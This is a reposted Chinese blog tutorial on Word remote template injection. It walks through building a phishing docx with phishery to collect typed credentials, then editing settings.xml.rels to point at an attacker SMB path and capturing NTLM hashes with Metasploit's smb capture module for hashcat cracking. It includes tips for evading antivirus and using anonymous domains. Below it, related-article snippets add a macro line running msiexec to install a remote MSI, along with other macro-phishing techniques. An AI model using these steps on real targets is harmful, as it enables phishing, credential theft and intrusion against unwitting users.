Word模板注入攻击

最新推荐文章于 2024-04-03 11:49:28 发布
转载 最新推荐文章于 2024-04-03 11:49:28 发布 · 1.1k 阅读 · 5 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/ldhbetter/p/10877392.html
文章标签:

#json #操作系统

Word模板注入攻击

0x00 工具准备

phishery:https://github.com/ryhanson/phishery/releases

office版本:office 2010

0x01 什么是Word模板注入攻击

Word模板注入攻击就是利用Word文档加载附加模板时的缺陷所发起的恶意请求而达到的攻击目的,所以当目标用户点开攻击者发给他的恶意word文档就可以通过向远程服务器发送恶意请求的方式,来盗取他的各类账号密码

 

0x02 通过远程模板注入盗取目标的各类普通账号密码

1、创建一个docx格式的word文件作为模板源文件,并编辑好文档内容

 

 

 

2、利用模板源文件(test.docx)生成真正的钓鱼文件

用到的工具为phishery,文档开头已提供下载链接(有多个平台的版本,此处用的linux下,在kali里操作的)

2.1 将test.docx放到工具phishery的目录下

 

 

2.2 执行以下命令生成真正的钓鱼文件
 ./phishery -u https://192.168.3.29/pass -i phishery.docx -o getpwd.docx 
 # 此处务必要注意,必须用 https 证书,都在当前目录下

 

 

2.3 修改生成的钓鱼文件的权限
chmod 777 getpwd.docx

 

 

3、启动phishery服务端(模拟web服务器)

phishery会用当前目录下的setting.json文件中的参数和证书作为默认配置,将记录到的账号密码放在credentials.json中

./phishery
cat credentials.json

 

 

 

4、将钓鱼文件getpwd.docx发送给目标

4.1 目标一点开文件就会弹出一个证书警告框,这一步很关键,只要用户选择了"是",我们的钓鱼文件就会自动去连接远程服务器并弹出基础认证钓鱼框,当目标输完账号以后就会被发送到我们自己的 smb 服务器上

 

 

 

 

 

 

4.2 当目标在弹出的登录框输入内容过后,回到攻击者的kali上,发现目标输入的账号密码都已经被记录

 

 

 

0x03 通过远程模板注入盗取目标系统用户密码的ntlm hash

1、修改之前生成的getpwd.docx解压出来的settings.xml.rels文件

1.1 将docx的文件后缀格式改为压缩文件的格式,如zip,然后将文件解压,找到word\_rels文件

 

1.2 编辑 settings.xml.rels,如下,定位到 Target 参数,将其改为 smb 的请求方式[即 UNC 路径],同时也可以尝试把 id[工具的敏感特征]改掉,以此躲避某些杀软

原来的:

 

 

更改的:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="file://192.168.175.137/" Tar getMode="External"/>
</Relationships>

 

 

2、修改好之后将之前解压出来的文件全部重新打包,并将后缀名字改回docx

2.1 全部重新打包为zip格式的压缩包

 

2.2 将打包好的压缩包的后缀更改为docx

 

 

3、回到攻击机kali上,打开msf,启动smb监听,将后续收到的hash都存到passwd中

msf > use auxiliary/server/capture/smb
msf > set srvhost 192.168.3.29
msf > set johnpwfile passwd
msf > exploit

 

 

4、将制作好的钓鱼文件getpwd发送给目标,当目标打开文件,攻击者便可以获取到他当前系统用户的密码hash

4.1 打开钓鱼文件,目标这里没有任何提示弹窗

 

 

4.2 再回到攻击机,发现目标用户系统的hash已经获取到了

 

 

4.3 最后,只需要把这些 hash 丢到 hashcat 里去跑就行了

 

0x05 关于实际利用过程中的一些注意事项

  • 需要一个靠谱的证书
  • 一个靠谱高匿的域名
  • 这种攻击方式的好处在于它并不依赖目标所使用的操作系统,完全依靠 word 自身特性来完成,所以有更强的适应性

 

0x06 来源

《Word 模版注入攻击详细利用过程 》--By Klion

 

转载于:https://www.cnblogs.com/ldhbetter/p/10877392.html

dda6607
关注
一文读懂!提示工程架构师应对提示注入攻击的超实用策略
AI天才研究院
08-04 1072
我们的目标是帮提示工程架构师理解提示注入的本质,并掌握可落地的防御策略。什么是提示注入?它为什么危险?防御策略的底层逻辑(不是“堆关键词”,是“断攻击链”);从“代码实战”到“场景落地”的全流程指导。故事引入:用“咖啡店收银员”的例子讲清提示注入的本质;核心概念:把“提示”“注入”“上下文”变成“生活常识”;攻击链拆解:用流程图看注入如何“绕开规则”;防御策略:5层防御体系,每层都有“代码+例子”;实战项目:用Python写一个“防注入的咖啡店客服AI”;未来趋势。
远程加载含有恶意代码的word模版文件上线CS
热门推荐
Shanfenglan's blog
08-31 24万+
原理 将直接加载远程带有宏的恶意模版使用。 缺点 目标主机的网速决定了加载远程模版的速度。有可能文件打开的会特别慢(例如将远程模版放在github),受害者可能在文件打开一半的时候强制关闭word。 优点 因为是远程加载,所以免杀效果十分不错。基本不会被杀毒软件拦截。 实现 第一步:制作一个恶意的模版并确保能够上线 这里以cs的宏木马为例。 获取到恶意的VB代码后打开word,在工具栏的空白区域右键,点击自定义功能区 勾选开发工具选项。 此时就会出现开发工具这一栏 此时点击Visual basi
恶意勒索Word文档模版注入分析
黑剑
04-03 1478
此次是简单的分析过程,主要用于困难环境下使用手动进行分析,在根据实际情况对相关的文档进行恶意分析!那么在智能沙箱的情况下,几乎这些手动的行为都被忽略了,所以会一些手动技巧也是巩固自身的知识,不依赖沙箱等情况!
Word文档注入宏实现钓鱼复现
nzyp_的博客
07-13 1101
Word文档注入宏实现钓鱼复现 网上很多相关的文章,但都不是很细节,遇到了一些问题,在这里统一汇总一下。 前期准备 环境准备: 一台kali用于使用CS、一台靶机、一台vps服务器(这里使用kali) Word使用系统自带的Word2007 开始复现 首先启用Word的开发工具选项 创建一个doc或者docx文档,起一个混淆的名字。 打开kali,运行cs,创建Lisenter,点击Attacks-Packages-MS Office Macro选择监听者,然后复制 打开doc,点击开发工具里的
利用DOCX文档远程模板注入执行宏代码
weixin_44922845的博客
04-03 3133
利用DOCX文档远程模板注入执行宏代码 简介 本地文件中在没有宏代码的情况下,攻击者可以尝试执行远程文件中宏代码。其中来自APT28的最新样本将此技术展现的淋漓尽致。该样本是docx文件,文件内没有任何宏相关信息,但是打开该文件后,却会弹出经典的“宏安全警告”。本实验将实现通过远程加载执行宏代码的攻击方式。 应用场景 该种攻击方式与传统的宏启用文档相比,这种攻击的好处是多方面的。在对目标执行网络...
word文档注入(追踪word文档)未完
qq_38641816的博客
03-16 454
1,需求 追踪word文档是否被打开 2,实现 正常来说,解压word文档。内部如下所示 打开如下目录所示的文件 在文档后面追加如下代码,这是个配置文件,target可以配置自己的url <Relationship Id="rId999" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="url" TargetMode="External"/&gt
宏病毒的研究与实例分析05——无宏文件携带宏病毒
鬼手的博客
03-11 1956
文章目录前言远程模板注入执行宏docx文件格式解析窃取NTLM Hashes小结说明 前言 docx文件可能是宏病毒吗? 如果你是一周前问笔者这个问题,笔者一定会斩钉截铁的说:”不可能!” 。笔者在之前的文章中提到过,docx中是不含宏的,所以不可能是宏病毒。但是,现在笔者却会斩钉截铁的说:”即使没有宏也可能是宏病毒!”。 故事要从很久很久以前说起,office文档诞生后不久,就迅速占领各大平台,...
利用DOCX文档远程模板注入执行宏
god_Zeo的安全博客
10-28 2326
利用DOCX文档远程模板注入执行宏 原理: 与传统的宏启用文档相比,这种攻击的好处是多方面的。在对目标执行网络钓鱼攻击时,您可以将.docx的文档直接附加到电子邮件中,并且您不太可能根据文件的拓展名去阻止它。 Word远程模板执行宏就是利用Word文档加载附加模板时的缺陷所发起的恶意请求而达到的攻击目的,所以当目标用户点开攻击者发给他的恶意word文档就可以通过向远程服务器发送恶意请求的方式,然...
Python模板注入(SSTI)
sleepywin的博客
09-11 1311
模板引擎可以让(网站)程序实现界面与数据分离,业务代码与逻辑代码分离。即也拓宽了攻击面,注入模板中的代码可能会引发RCE或XSS。攻击者可利用模板注入漏洞执行任意的python代码,包括读取敏感文件、执行系统命令、访问数据库等。通常会通过在用户输入中插入。模板注入漏洞可能导致攻击者能够执行恶意代码或访问未授权的数据。在python中,常见的模板引擎包括。Jinja2中使用{{...}}或{%...%},使得攻击者能够在模板中插入恶意代码。未正确过滤或转义用户提供的输入时。使用模板引擎解析用户提供的输入。
web安全-SSTI模板注入漏洞
weixin_61956136的博客
07-31 4158
web安全-SSTI模板注入漏洞
恶意Word文档模版注入分析
04-02
### 恶意Word文档模版注入分析 #### 背景与意义 在现代网络安全领域,恶意文档已经成为一种常见的攻击载体。攻击者利用这些文档实施各种恶意活动,包括但不限于宏病毒传播、恶意代码执行以及社会工程学攻击。本文...
网络安全之内外网渗透-网络钓鱼技巧
weixin_46626737的博客
06-30 368
操作:先使用msf生成一个msi文件,放到云服务器上,然后新建一个excle表,右键点击插入宏表,然后第一格输入=EXEC(“msiexec /q /i http://192.168.10.88/123.msi”),第二格输入=HALT()入cs生成的代码,选择auto open选项,然后保存,弹出的框选择否,然后会出现另存为,选择dotm启用宏的文件,在通过邮件发。利用生成的宏代码,放到word中,记得word一定要开启开发者模式,在开发者模式中选择宏,取名,编辑,在编辑弹出的框中加。
服务端模板注入攻击原理以及实战(SSTI)
Ba1_Ma0的博客
04-10 3975
什么是模板 简单来说,就是网站内容的动态部分,如果有一个网站的内容几乎相同,但只有某些部分发生改变,那么他们很有可能使用了模板 模板看起来如下: hello{user.name} 他们有一个静态罐和一个动态罐,hello为静态罐,{}里的内容为动态罐 这就是为什么编译器如何是知道该部分是动态的,另外需要注意的是,并非是所有模板看起来都是像上面那样,列如: hello{{user.name}} 这是一个名为jinja模板引擎的示例,用流行的python框架(如django和flask)所使用 什么是模板
【安全漏洞】黑客利用IE 0 day漏洞部署VBA恶意软件
HBohan的博客
08-04 436
远程模板 研究人员分析settings.xml.rels中嵌入的远程模板发现其中含有完全特征的VBA 远程访问木马,可以执行以下功能: ◼收集受害者信息; ◼识别受害者机器上运行的反病毒软件; ◼执行shell-code; ◼删除文件; ◼上传和下载文件; ◼读取硬盘和文件系统信息。 第二个模板嵌入在Document.xml.rels文件中,会加载在文件中。研究人员分析加载的代码发现其中包含一个IE CVE-2021-26411漏洞利用,该漏洞利用曾被Lazarus APT组织用于攻击安全研究人员。漏洞利用
MSF利用宏病毒感染word文档获取shell复现
永远是少年
06-14 3129
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF利用宏病毒感染word文档获取shell复现。 一、环境准备 二、宏文档生成 三、效果检验
客户端渗透之——基于Word文件格式的渗透攻击
冰河的专栏
01-24 1937
转载请注明出处:https://blog.youkuaiyun.com/l1028386804/article/details/86633173 攻击机: Kali 192.168.175.128 靶机 WinXP 192.168.175.130 程序 Office 2003 1.生成Word文档 msfconsole use exploit/windows/fileformat/ms10_087...
settings.xml详解
登高必自卑 行远必自迩
02-10 1万+
介绍概述  settings.xml文件中的<settings>包含一系列用于配置Maven执行方式的元素,如本地仓库位置、远程仓库服务器和身份验证信息等,类似pom.xml,但不捆绑到任何特定项目,或分发给受众。   settings.xml文件一般位于以下两个位置: ${maven.home}/conf/settings.xml ${user.home}/.m2/settings.xml(没有
实现一个远程宏模板执行恶意代码
信息安全
11-09 843
文章目录原理实现创建宏模板创建加载远程宏文档文件运行总结 原理 word远程宏模板是利用word文档加载附加模板时向远程服务器发起请求而达成攻击的目的,请求并加载远程的恶意宏模板可用来执行恶意行为 文档本身无恶意代码,内容中只有指向远程服务器地址的url,可以绕过安全软件的静态查杀 实现 创建宏模板 在这里生成了两种宏模板,一种是cs生成的后门,一种是测试的弹框宏代码 使用CS,生成宏代码 创建一个docx文件,Alt+F11 启动vb编辑器,将代码粘贴进去,另存为dotm文件 测试弹框的宏代码 创建
使用恶意捆绑URL工具入侵Windows(恶意文档利用)
我不是猫叔
09-08 685
恶意盗取Windows 登录密码的Word 文档 通过使用phishery工具将恶意url注入word文档,这将导致MicrosoftWord向URL发出请求,从而向最终用户显示身份验证对话框。可以使用phishery的URL注入任何.docx文件。 第一步:根据需要修改提供的setings.json文件,默认情况下它应该如下所示 { “ip”: “0.0.0.0”, “port”: “443...
word文档注入
最新发布
07-24
### Word文档代码注入方法及安全漏洞分析 Word文档作为一种广泛使用的办公文档格式,其安全性问题也日益受到关注。攻击者可以通过多种方式在Word文档中执行代码注入,从而实现远程控制、数据窃取等恶意行为。以下是几种常见的Word文档代码注入方法及其相关的安全漏洞。 #### 1. 恶意Office文档攻击 攻击者通常通过发送带有恶意附件的钓鱼邮件,诱导用户打开文档。一旦用户打开文档,内嵌的恶意代码会在用户无感知的情况下执行,进而从远程服务器下载并运行恶意程序,如远控木马或勒索病毒。这种攻击方式依赖于用户对文档的信任以及Office软件本身的漏洞[^1]。 #### 2. 模板注入(Template Injection) 模板注入是一种较为隐蔽的攻击方式,攻击者并不依赖传统的VBA宏或嵌入式脚本,而是通过修改Word文档的模板(.dotm文件)来注入恶意代码。当用户打开文档时,模板中的恶意代码会被自动加载并执行。这种方式常用于攻击企业的关键基础设施,攻击者通过钓鱼邮件发送伪装成简历或环境报告的文档,进而获取用户凭证和网络访问权限[^3]。 #### 3. XML外部实体(XXE)注入 在某些情况下,Word文档可能包含可解析的XML内容。攻击者可以利用XML解析器的漏洞,构造恶意XML文档,导致应用程序在解析时访问本地或远程资源,甚至执行任意代码。例如,攻击者可以构造一个包含恶意实体的XML文档,诱导用户打开后触发敏感信息泄露或远程代码执行[^2]。 --- ### 安全防护措施 为了有效防范Word文档中的代码注入攻击,建议采取以下安全措施: #### 1. 禁用宏和外部内容 - **禁用宏**:在Word中默认禁用宏功能,仅在确认文档来源可信的情况下启用宏。 - **阻止外部链接**:配置Word设置以阻止自动加载外部内容,如图片、模板或链接对象。 #### 2. 更新与补丁管理 - 定期更新Microsoft Office及相关软件,确保安装最新的安全补丁,防止已知漏洞被利用。 #### 3. 使用沙箱和隔离环境 - 在沙箱环境中打开可疑文档,避免恶意代码直接感染主系统。 - 使用虚拟机或隔离浏览器打开来自未知来源的文档。 #### 4. 启用文档验证机制 - 对于企业用户,可以部署文档验证工具,自动检测文档中是否存在可疑的宏、模板或外部引用。 - 使用数字签名机制,确保文档来源的可信性。 #### 5. 用户安全意识培训 - 对员工进行安全意识培训,识别钓鱼邮件和可疑附件。 - 提高用户对未知来源文档的警惕性,避免随意打开不明邮件附件。 --- ### 示例:检测Word文档中的恶意模板 以下是一个简单的Python脚本示例,用于检测Word文档是否包含外部模板链接: ```python from docx import Document def check_external_template(doc_path): try: doc = Document(doc_path) # 检查文档的关联模板 if 'http' in doc.core_properties.last_modified_by: print("警告:文档可能包含外部模板引用") else: print("文档未检测到外部模板引用") except Exception as e: print(f"无法解析文档:{e}") # 示例调用 check_external_template("suspicious_document.docx") ``` 该脚本通过读取文档的核心属性来检测是否存在外部模板引用,虽然不是万无一失,但可以作为初步筛查手段。 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符  | 博主筛选后可见
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值